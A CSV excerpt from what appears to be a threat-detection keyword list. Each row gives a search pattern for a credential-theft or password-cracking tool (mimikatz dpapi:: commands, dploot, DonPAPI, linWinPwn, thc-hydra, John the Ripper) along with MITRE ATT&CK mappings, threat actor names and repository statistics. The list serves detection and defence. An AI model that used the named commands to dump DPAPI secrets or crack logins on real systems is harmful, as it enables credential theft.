"*dpapi::cred*",".{0,1000}dpapi\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41508"
"*dpapi::credhist*",".{0,1000}dpapi\:\:credhist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41509"
"*dpapi::luna*",".{0,1000}dpapi\:\:luna.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41510"
"*dpapi::masterkey*",".{0,1000}dpapi\:\:masterkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41511"
"*dpapi::protect*",".{0,1000}dpapi\:\:protect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41512"
"*dpapi::ps*",".{0,1000}dpapi\:\:ps.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41513"
"*dpapi::rdg*",".{0,1000}dpapi\:\:rdg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41514"
"*dpapi::sccm*",".{0,1000}dpapi\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41515"
"*dpapi::ssh*",".{0,1000}dpapi\:\:ssh.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41516"
"*dpapi::tpm*",".{0,1000}dpapi\:\:tpm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41517"
"*dpapi::vault*",".{0,1000}dpapi\:\:vault.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41518"
"*dpapi::wifi*",".{0,1000}dpapi\:\:wifi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41519"
"*dpapi::wwman*",".{0,1000}dpapi\:\:wwman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41520"
"*dpapi_dump*",".{0,1000}dpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41521"
"*dpapi_dump_*.txt*",".{0,1000}dpapi_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41522"
"*dpapi_pick/credhist.py*",".{0,1000}dpapi_pick\/credhist\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41523"
"*DPAPImk2john.py*",".{0,1000}DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41524"
"*dpl4hydra *",".{0,1000}dpl4hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41525"
"*dpl4hydra.sh*",".{0,1000}dpl4hydra\.sh.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41526"
"*dpl4hydra_*.csv*",".{0,1000}dpl4hydra_.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41527"
"*dpl4hydra_*.tmp*",".{0,1000}dpl4hydra_.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41528"
"*dpl4hydra_linksys*",".{0,1000}dpl4hydra_linksys.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41529"
"*dploot -*",".{0,1000}dploot\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41530"
"*dploot sccm -d*",".{0,1000}dploot\ssccm\s\-d.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41531"
"*dploot*backupkey*",".{0,1000}dploot.{0,1000}backupkey.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41532"
"*dploot*browser*",".{0,1000}dploot.{0,1000}browser.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41533"
"*dploot*certificates*",".{0,1000}dploot.{0,1000}certificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41534"
"*dploot*credentials*",".{0,1000}dploot.{0,1000}credentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41535"
"*dploot*machinecertificates*",".{0,1000}dploot.{0,1000}machinecertificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41536"
"*dploot*machinecredentials*",".{0,1000}dploot.{0,1000}machinecredentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41537"
"*dploot*machinemasterkeys*",".{0,1000}dploot.{0,1000}machinemasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41538"
"*dploot*machinevaults*",".{0,1000}dploot.{0,1000}machinevaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41539"
"*dploot*masterkeys*",".{0,1000}dploot.{0,1000}masterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41540"
"*dploot*vaults*",".{0,1000}dploot.{0,1000}vaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41541"
"*dploot*wifi*",".{0,1000}dploot.{0,1000}wifi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41542"
"*dploot.lib.dpapi*",".{0,1000}dploot\.lib\.dpapi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41543"
